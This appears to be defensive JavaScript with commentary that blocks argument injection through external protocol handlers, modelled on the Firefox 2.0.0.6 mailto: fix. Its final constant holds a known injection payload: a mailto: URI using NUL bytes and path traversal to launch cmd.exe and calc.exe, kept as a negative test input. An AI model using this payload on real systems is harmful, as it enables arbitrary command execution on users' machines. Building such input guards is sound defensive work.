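function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(String(url));
  return m ? m[1].toLowerCase() : null;
}

// 1. The 2.0.0.6 / NoScript fix as Giorgio describes it: percent-encode
//    spaces and double quotes so the handler's command line cannot be split
//    into extra arguments.
function encodeForExternalHandler(url) {
  return String(url).replace(/ /g, '%20').replace(/"/g, '%22');
}

// 2. Ronald's point: refuse anything carrying a NUL, raw or percent-encoded;
//    a NUL truncates C strings downstream and hides what follows it.
function containsNul(url) {
  return /\x00|%00/i.test(String(url));
}

// 3. Ronald's later point: only a few schemes are enabled by default; the
//    rest are opt-in. Returns { ok: true, url } or { ok: false, reason }.
function guardExternalUrl(url, allowed = ALLOWED_EXTERNAL_SCHEMES) {
  const scheme = schemeOf(url);
  if (scheme === null) return { ok: false, reason: 'no scheme' };
  if (!allowed.has(scheme)) return { ok: false, reason: 'scheme not enabled: ' + scheme };
  if (containsNul(url)) return { ok: false, reason: 'NUL byte in URL' };
  return { ok: true, url: encodeForExternalHandler(url) };
}

// The mailto: URI shown in the post, used here only as a negative test input.
const MAILTO_SAMPLE =
  'mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat';
```

The order matters: the scheme check runs first so that disabled handlers are never reached at all, and encoding is applied only to what is actually passed on. Dan Veditz's observation that the Run box behaves the same way is the reason the encoding step exists: the browser cannot rely on the handler to parse its argument safely.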